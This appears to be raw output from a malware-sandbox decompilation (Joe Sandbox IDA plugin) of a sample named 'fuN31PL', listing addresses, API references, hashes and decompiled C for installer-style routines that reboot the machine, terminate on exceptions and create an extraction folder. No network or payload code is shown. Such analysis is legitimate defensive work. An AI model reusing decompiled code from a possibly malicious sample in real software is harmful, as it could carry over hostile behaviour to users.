                                                                                                                                                                                                                                              0x001a5d5b
                                                                                                                                                                                                                                              0x001a5d72
                                                                                                                                                                                                                                              0x001a60fb
                                                                                                                                                                                                                                              0x001a60fb
                                                                                                                                                                                                                                              0x001a6207
                                                                                                                                                                                                                                              0x001a620a
                                                                                                                                                                                                                                              0x001a620b
                                                                                                                                                                                                                                              0x001a620e
                                                                                                                                                                                                                                              0x001a6217
                                                                                                                                                                                                                                              0x001a5d78
                                                                                                                                                                                                                                              0x001a5d78
                                                                                                                                                                                                                                              0x001a5d80
                                                                                                                                                                                                                                              0x001a5d83
                                                                                                                                                                                                                                              0x001a5d84
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d84
                                                                                                                                                                                                                                              0x001a5d5d
                                                                                                                                                                                                                                              0x001a5d5f
                                                                                                                                                                                                                                              0x001a5d62
                                                                                                                                                                                                                                              0x001a5d68
                                                                                                                                                                                                                                              0x001a5d64
                                                                                                                                                                                                                                              0x001a5d64
                                                                                                                                                                                                                                              0x001a5d64
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d62
                                                                                                                                                                                                                                              0x001a5d5b
                                                                                                                                                                                                                                              0x001a5d4f
                                                                                                                                                                                                                                              0x001a5d1d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d9f
                                                                                                                                                                                                                                              0x001a5d9f
                                                                                                                                                                                                                                              0x001a5da5
                                                                                                                                                                                                                                              0x001a5dab
                                                                                                                                                                                                                                              0x001a5dba
                                                                                                                                                                                                                                              0x001a6218
                                                                                                                                                                                                                                              0x001a621d
                                                                                                                                                                                                                                              0x001a6220
                                                                                                                                                                                                                                              0x001a6221
                                                                                                                                                                                                                                              0x001a6229
                                                                                                                                                                                                                                              0x001a6230
                                                                                                                                                                                                                                              0x001a6247
                                                                                                                                                                                                                                              0x001a626a
                                                                                                                                                                                                                                              0x001a6272
                                                                                                                                                                                                                                              0x001a6249
                                                                                                                                                                                                                                              0x001a6255
                                                                                                                                                                                                                                              0x001a625f
                                                                                                                                                                                                                                              0x001a6264
                                                                                                                                                                                                                                              0x001a6264
                                                                                                                                                                                                                                              0x001a6284
                                                                                                                                                                                                                                              0x001a5dc0
                                                                                                                                                                                                                                              0x001a5dc0
                                                                                                                                                                                                                                              0x001a5dca
                                                                                                                                                                                                                                              0x001a5e22
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5dcc
                                                                                                                                                                                                                                              0x001a5dce
                                                                                                                                                                                                                                              0x001a5e24
                                                                                                                                                                                                                                              0x001a5e24
                                                                                                                                                                                                                                              0x001a5e2c
                                                                                                                                                                                                                                              0x001a5e47
                                                                                                                                                                                                                                              0x001a5e4a
                                                                                                                                                                                                                                              0x001a61d2
                                                                                                                                                                                                                                              0x001a61e2
                                                                                                                                                                                                                                              0x001a61e7
                                                                                                                                                                                                                                              0x001a61ee
                                                                                                                                                                                                                                              0x001a61f1
                                                                                                                                                                                                                                              0x001a61f1
                                                                                                                                                                                                                                              0x001a61f8
                                                                                                                                                                                                                                              0x001a61f8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5fb9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5fb9
                                                                                                                                                                                                                                              0x001a5fb7
                                                                                                                                                                                                                                              0x001a5fb3
                                                                                                                                                                                                                                              0x001a5faf
                                                                                                                                                                                                                                              0x001a5f8d
                                                                                                                                                                                                                                              0x001a5f8d
                                                                                                                                                                                                                                              0x001a5f8d
                                                                                                                                                                                                                                              0x001a5f8f
                                                                                                                                                                                                                                              0x001a5fc1
                                                                                                                                                                                                                                              0x001a5fc1
                                                                                                                                                                                                                                              0x001a5fc1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5e74
                                                                                                                                                                                                                                              0x001a5e74
                                                                                                                                                                                                                                              0x001a5e77
                                                                                                                                                                                                                                              0x001a5ea0
                                                                                                                                                                                                                                              0x001a5ebd
                                                                                                                                                                                                                                              0x001a5f79
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5f7f
                                                                                                                                                                                                                                              0x001a5ec3
                                                                                                                                                                                                                                              0x001a5ec3
                                                                                                                                                                                                                                              0x001a5ecc
                                                                                                                                                                                                                                              0x001a5ed4
                                                                                                                                                                                                                                              0x001a5ed6
                                                                                                                                                                                                                                              0x001a5edc
                                                                                                                                                                                                                                              0x001a5edf
                                                                                                                                                                                                                                              0x001a5eea
                                                                                                                                                                                                                                              0x001a5eed
                                                                                                                                                                                                                                              0x001a5f3f
                                                                                                                                                                                                                                              0x001a5f40
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5eef
                                                                                                                                                                                                                                              0x001a5eef
                                                                                                                                                                                                                                              0x001a5ef2
                                                                                                                                                                                                                                              0x001a5f34
                                                                                                                                                                                                                                              0x001a5ef4
                                                                                                                                                                                                                                              0x001a5ef4
                                                                                                                                                                                                                                              0x001a5ef7
                                                                                                                                                                                                                                              0x001a5f2b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5ef9
                                                                                                                                                                                                                                              0x001a5ef9
                                                                                                                                                                                                                                              0x001a5efc
                                                                                                                                                                                                                                              0x001a5f22
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5efe
                                                                                                                                                                                                                                              0x001a5eff
                                                                                                                                                                                                                                              0x001a5f02
                                                                                                                                                                                                                                              0x001a5f16
                                                                                                                                                                                                                                              0x001a5f04
                                                                                                                                                                                                                                              0x001a5f07
                                                                                                                                                                                                                                              0x001a5f0d
                                                                                                                                                                                                                                              0x001a5f46
                                                                                                                                                                                                                                              0x001a5f46
                                                                                                                                                                                                                                              0x001a5f09
                                                                                                                                                                                                                                              0x001a5f09
                                                                                                                                                                                                                                              0x001a5f09
                                                                                                                                                                                                                                              0x001a5f07
                                                                                                                                                                                                                                              0x001a5f02
                                                                                                                                                                                                                                              0x001a5efc
                                                                                                                                                                                                                                              0x001a5ef7
                                                                                                                                                                                                                                              0x001a5ef2
                                                                                                                                                                                                                                              0x001a5f4c
                                                                                                                                                                                                                                              0x001a5f4e
                                                                                                                                                                                                                                              0x001a5f50
                                                                                                                                                                                                                                              0x001a5f54
                                                                                                                                                                                                                                              0x001a5ed4
                                                                                                                                                                                                                                              0x001a5ea2
                                                                                                                                                                                                                                              0x001a5ea4
                                                                                                                                                                                                                                              0x001a5eaf
                                                                                                                                                                                                                                              0x001a5eaf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5e79
                                                                                                                                                                                                                                              0x001a5e7d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5e83
                                                                                                                                                                                                                                              0x001a5e83
                                                                                                                                                                                                                                              0x001a5e83
                                                                                                                                                                                                                                              0x001a5e85
                                                                                                                                                                                                                                              0x001a5e85
                                                                                                                                                                                                                                              0x001a5e8e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5e94
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5e94
                                                                                                                                                                                                                                              0x001a5e8e
                                                                                                                                                                                                                                              0x001a5e7d
                                                                                                                                                                                                                                              0x001a5e77
                                                                                                                                                                                                                                              0x001a5e6e
                                                                                                                                                                                                                                              0x001a5e65
                                                                                                                                                                                                                                              0x001a5e5c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5dd0
                                                                                                                                                                                                                                              0x001a5dd0
                                                                                                                                                                                                                                              0x001a5dd0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5dd0
                                                                                                                                                                                                                                              0x001a5dce
                                                                                                                                                                                                                                              0x001a5dca
                                                                                                                                                                                                                                              0x001a5dba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5d00
                                                                                                                                                                                                                                              0x001a5dd9
                                                                                                                                                                                                                                              0x001a5e04
                                                                                                                                                                                                                                              0x001a61fe
                                                                                                                                                                                                                                              0x001a5e0a
                                                                                                                                                                                                                                              0x001a5e0c
                                                                                                                                                                                                                                              0x001a5e17
                                                                                                                                                                                                                                              0x001a5e17
                                                                                                                                                                                                                                              0x001a5e04
                                                                                                                                                                                                                                              0x001a6200
                                                                                                                                                                                                                                              0x001a6200
                                                                                                                                                                                                                                              0x00000000

APIs
• CharNextA.USER32(?,00000000,?,?), ref: 001A5CEE
• GetModuleFileNameA.KERNEL32(001A8B3E,00000104,00000000,?,?), ref: 001A5DFC
• CharUpperA.USER32(?), ref: 001A5E3E
• CharUpperA.USER32(-00000052), ref: 001A5EE1
• CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 001A5F6F
• CharUpperA.USER32(?), ref: 001A5FA7
• CharUpperA.USER32(-0000004E), ref: 001A6008
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 001A60AA
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,001A1140,00000000,00000040,00000000), ref: 001A61F1
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 001A61F8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                              • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                              • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                              • Opcode ID: 19f5f2cb2990a38cd7841eca4a9dc75db04f41b3d2894aee30459b26f6a27996
                                                                                                                                                                                                                                              • Instruction ID: 5c7ee686f8f16422b5187510ab481d4e4dfefebee93a1372ce735d48447aa0d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19f5f2cb2990a38cd7841eca4a9dc75db04f41b3d2894aee30459b26f6a27996
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98D16D7DA0CA545EDF368B388C487FA7B67AB27310F1800AAD496D7595DB708EC6CB40
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                                                                                                              			E001A1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                                                                              				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                                                              				int _t28;
                                                                                                                                                                                                                                              				signed char _t30;
                                                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                                                              				void* _t40;
                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t41 = __esi;
                                                                                                                                                                                                                                              				_t38 = __edi;
                                                                                                                                                                                                                                              				_t30 = __ecx;
                                                                                                                                                                                                                                              				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						if( *0x1a9a40 != 0) {
                                                                                                                                                                                                                                              							_pop(_t30);
                                                                                                                                                                                                                                              							_t44 = _t46;
                                                                                                                                                                                                                                              							_t13 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                              							_push(_t38);
                                                                                                                                                                                                                                              							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                              								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                              								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                              								_v12 = 2;
                                                                                                                                                                                                                                              								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                              								CloseHandle(_v28);
                                                                                                                                                                                                                                              								_t41 = _t41;
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								if(_t21 != 0) {
                                                                                                                                                                                                                                              									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                              										_t25 = 1;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t37 = 0x4f7;
                                                                                                                                                                                                                                              										goto L3;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t37 = 0x4f6;
                                                                                                                                                                                                                                              									goto L4;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t37 = 0x4f5;
                                                                                                                                                                                                                                              								L3:
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								L4:
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								E001A44B9(0, _t37);
                                                                                                                                                                                                                                              								_t25 = 0;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_pop(_t40);
                                                                                                                                                                                                                                              							return E001A6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t37 = 0x522;
                                                                                                                                                                                                                                              						_t28 = E001A44B9(0, 0x522, 0x1a1140, 0, 0x40, 4);
                                                                                                                                                                                                                                              						if(_t28 != 6) {
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					__eax = E001A1EA7(__ecx);
                                                                                                                                                                                                                                              					if(__eax != 2) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						return _t28;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 001A1EFB
                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 001A1F02
                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 001A1FD3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                              • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                              • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                              • Opcode ID: 38e30d6b36c35a8906d4da4572c5948824dc2cdfce52d7e36e71da21d832e5fa
                                                                                                                                                                                                                                              • Instruction ID: 7d4eb5eb27f84e07a8668df5034bd42b4246aca95cad8d9a04e9c972df8b12a3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38e30d6b36c35a8906d4da4572c5948824dc2cdfce52d7e36e71da21d832e5fa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C521B2B9B402457FDB209BA19C4AFBF7AB8EB87B11F600019FA02E6581D7748849D661
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                              				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                              			}



                                                                                                                                                                                                                                              0x001a6cf7
                                                                                                                                                                                                                                              0x001a6d00
                                                                                                                                                                                                                                              0x001a6d19

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,001A6E26,001A1000), ref: 001A6CF7
                                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(001A6E26,?,001A6E26,001A1000), ref: 001A6D00
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,001A6E26,001A1000), ref: 001A6D0B
                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,001A6E26,001A1000), ref: 001A6D12
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                                                                                                                              • Opcode ID: 1ea5b3f2335e5ce053aa73fd8b86f9e91f41db2e343e39b5b8d2f1f260b6b7e2
                                                                                                                                                                                                                                              • Instruction ID: 0e728b5cd03fe1bb4ca409aaa17d49f767ae58d32cd5c006ff5fe535e090155d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ea5b3f2335e5ce053aa73fd8b86f9e91f41db2e343e39b5b8d2f1f260b6b7e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84D0C932000108BBDB412BE1EC0CA593F28EF4A212F844000F31982820CB324491CB52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                                                                                                              			E001A3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				int _t20;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				int _t23;
                                                                                                                                                                                                                                              				char _t24;
                                                                                                                                                                                                                                              				long _t25;
                                                                                                                                                                                                                                              				int _t27;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                                                              				int _t33;
                                                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                                                              				int _t38;
                                                                                                                                                                                                                                              				int _t39;
                                                                                                                                                                                                                                              				void* _t42;
                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                              				CHAR* _t49;
                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                              				void* _t63;
                                                                                                                                                                                                                                              				struct HWND__* _t64;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t64 = _a4;
                                                                                                                                                                                                                                              				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t6 == 0) {
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					L38:
                                                                                                                                                                                                                                              					EndDialog(_t64, ??);
                                                                                                                                                                                                                                              					L39:
                                                                                                                                                                                                                                              					__eflags = 1;
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t42 = 1;
                                                                                                                                                                                                                                              				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                              				if(_t10 == 0) {
                                                                                                                                                                                                                                              					E001A43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                              					SetWindowTextA(_t64, "lenta");
                                                                                                                                                                                                                                              					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                              					__eflags =  *0x1a9a40 - _t42; // 0x3
                                                                                                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                                                                                                              						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L36:
                                                                                                                                                                                                                                              					return _t42;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t10 == _t42) {
                                                                                                                                                                                                                                              					_t20 = _a12 - 1;
                                                                                                                                                                                                                                              					__eflags = _t20;
                                                                                                                                                                                                                                              					if(_t20 == 0) {
                                                                                                                                                                                                                                              						_t21 = GetDlgItemTextA(_t64, 0x835, 0x1a91e4, 0x104);
                                                                                                                                                                                                                                              						__eflags = _t21;
                                                                                                                                                                                                                                              						if(_t21 == 0) {
                                                                                                                                                                                                                                              							L32:
                                                                                                                                                                                                                                              							_t58 = 0x4bf;
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0x10);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							L25:
                                                                                                                                                                                                                                              							E001A44B9(_t64, _t58);
                                                                                                                                                                                                                                              							goto L39;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t49 = 0x1a91e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t23 =  *_t49;
                                                                                                                                                                                                                                              							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                              							__eflags = _t23;
                                                                                                                                                                                                                                              						} while (_t23 != 0);
                                                                                                                                                                                                                                              						__eflags = _t49 - 0x1a91e5 - 3;
                                                                                                                                                                                                                                              						if(_t49 - 0x1a91e5 < 3) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t24 =  *0x1a91e5; // 0x3a
                                                                                                                                                                                                                                              						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                              						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                              							L21:
                                                                                                                                                                                                                                              							_t25 = GetFileAttributesA(0x1a91e4);
                                                                                                                                                                                                                                              							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                              							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              								L26:
                                                                                                                                                                                                                                              								E001A658A(0x1a91e4, 0x104, 0x1a1140);
                                                                                                                                                                                                                                              								_t27 = E001A58C8(0x1a91e4);
                                                                                                                                                                                                                                              								__eflags = _t27;
                                                                                                                                                                                                                                              								if(_t27 != 0) {
                                                                                                                                                                                                                                              									__eflags =  *0x1a91e4 - 0x5c;
                                                                                                                                                                                                                                              									if( *0x1a91e4 != 0x5c) {
                                                                                                                                                                                                                                              										L30:
                                                                                                                                                                                                                                              										_t30 = E001A597D(0x1a91e4, 1, _t64, 1);
                                                                                                                                                                                                                                              										__eflags = _t30;
                                                                                                                                                                                                                                              										if(_t30 == 0) {
                                                                                                                                                                                                                                              											L35:
                                                                                                                                                                                                                                              											_t42 = 1;
                                                                                                                                                                                                                                              											__eflags = 1;
                                                                                                                                                                                                                                              											goto L36;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										L31:
                                                                                                                                                                                                                                              										_t42 = 1;
                                                                                                                                                                                                                                              										EndDialog(_t64, 1);
                                                                                                                                                                                                                                              										goto L36;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									__eflags =  *0x1a91e5 - 0x5c;
                                                                                                                                                                                                                                              									if( *0x1a91e5 == 0x5c) {
                                                                                                                                                                                                                                              										goto L31;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									goto L30;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_t58 = 0x4be;
                                                                                                                                                                                                                                              								goto L25;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t32 = E001A44B9(_t64, 0x54a, 0x1a91e4, 0, 0x20, 4);
                                                                                                                                                                                                                                              							__eflags = _t32 - 6;
                                                                                                                                                                                                                                              							if(_t32 != 6) {
                                                                                                                                                                                                                                              								goto L35;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t33 = CreateDirectoryA(0x1a91e4, 0);
                                                                                                                                                                                                                                              							__eflags = _t33;
                                                                                                                                                                                                                                              							if(_t33 != 0) {
                                                                                                                                                                                                                                              								goto L26;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0x10);
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              							_push(0x1a91e4);
                                                                                                                                                                                                                                              							_t58 = 0x4cb;
                                                                                                                                                                                                                                              							goto L25;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags =  *0x1a91e4 - 0x5c;
                                                                                                                                                                                                                                              						if( *0x1a91e4 != 0x5c) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                              						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                              							goto L32;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t34 = _t20 - 1;
                                                                                                                                                                                                                                              					__eflags = _t34;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						EndDialog(_t64, 0);
                                                                                                                                                                                                                                              						 *0x1a9124 = 0x800704c7;
                                                                                                                                                                                                                                              						goto L39;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                              					if(_t34 != 0x834) {
                                                                                                                                                                                                                                              						goto L36;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t37 = LoadStringA( *0x1a9a3c, 0x3e8, 0x1a8598, 0x200);
                                                                                                                                                                                                                                              					__eflags = _t37;
                                                                                                                                                                                                                                              					if(_t37 != 0) {
                                                                                                                                                                                                                                              						_t38 = E001A4224(_t64, _t46, _t46);
                                                                                                                                                                                                                                              						__eflags = _t38;
                                                                                                                                                                                                                                              						if(_t38 == 0) {
                                                                                                                                                                                                                                              							goto L36;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t39 = SetDlgItemTextA(_t64, 0x835, 0x1a87a0);
                                                                                                                                                                                                                                              						__eflags = _t39;
                                                                                                                                                                                                                                              						if(_t39 != 0) {
                                                                                                                                                                                                                                              							goto L36;
                                                                                                                                                                                                                                              						}
